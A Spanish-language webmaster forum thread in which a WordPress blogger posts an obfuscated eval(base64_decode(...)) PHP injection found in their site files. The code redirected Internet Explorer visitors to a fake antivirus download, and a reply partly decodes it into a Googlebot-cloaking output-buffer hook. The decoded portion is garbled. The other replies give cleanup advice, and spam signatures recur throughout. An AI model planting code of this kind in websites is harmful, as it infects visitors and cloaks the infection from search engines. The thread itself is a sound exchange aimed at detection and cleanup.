Amigos demenitas , me gustaria saber si alguno de ustedes en su carrera dominera o desarrolladora je je , a tenido un ataque a alguno de sus blogs en wordpres , es que note algo extraño en un blog ,cuando abria la web con firefox todo parecia normal , pero cuando abria la pagina con explorer despues de un rato de estar en mi blog me redirigia a una web para descargar un sofware antiviruz o algo asi.

me puse a revisar el codigo php del wordpres , los html que tenia y uno que otro php mio y me llevo la sorpresa que arriba antes de comenzar una sentencia <?php tenian pegado este codigo :
<blockquote>
<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8
nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3
RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgI
CByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCO
DFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>

</blockquote>

No tengo la mas minima idea de que signifique , ya lo borre manualmente de los documentos php implicados , actualize el wordpres y cambie la passwd del ftp del host.

alguno de ustedes a vivido exta terrible expereincia ??

Gracias a ese bicho mis ingresos en adsense se redujeron a la mitad por unos buenos dias ... disculpen la ortografia o si escribi algo mal ya no puedo con el sueño je je , pero queria salir de esta duda cuanto antes .... muchas gracias por su respuesta Suplementos deportivos proteinas , creatinas , suplementos musculacion

Revisa con un software antivirus/antispyware tu PC, suelen usar programas para infectarlo, conseguir las claves del FTP y luego modificar el código de los archivos html desde múltiples IPs distintas, revisando los logs normalmente se detecta rápidamente. Normalmente bastará con que cambies el pass del FTP tras limpiar tu PC y subas de nuevo la copia que tengas guardada en local.
Si tras un tiempo la web sigue con el mismo problema, google puede marcar tu web como peligrosa e indicarlo mediante un mensaje muy molesto a tus visitantes, las visitas a la web disminuirían drásticamente. SuerteDomaining...! Te ayudo con la gestión de tus dominios en INWX España

No controlo mucho de esto tampoco, pero parece que tiene una doble codificación, se queda en algo asi;
if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){ $GLOBALS['mr_no']=1;
if(!function_exists('mrobh')){ if(!function_exists('gml')){ function gml(){
if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&&
(!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){
return base64_decode("PHNjcmlwdt#S?3S#?DR?²ÖVÇ6W²
&WGW&âE$s?$C4t#?S#?33c?ct#S?3S#?DRævÖÂ??²
ÒÒö%÷7F'B?v×&ö&?r?²ÒMetro Barcelona

El nombre del bicho ese que me ataco el blog es Ninoplas Base64 , alguien conoce alguna forma de evitar esas molestas inyecciones SQL o algun pluggin o software que ayude a evitar eso ?? , Suplementos deportivos proteinas , creatinas , suplementos musculacion

Gracias corso Suplementos deportivos proteinas , creatinas , suplementos musculacion

mmmm siiiii estaba en godaddy , gopapi Suplementos deportivos proteinas , creatinas , suplementos musculacion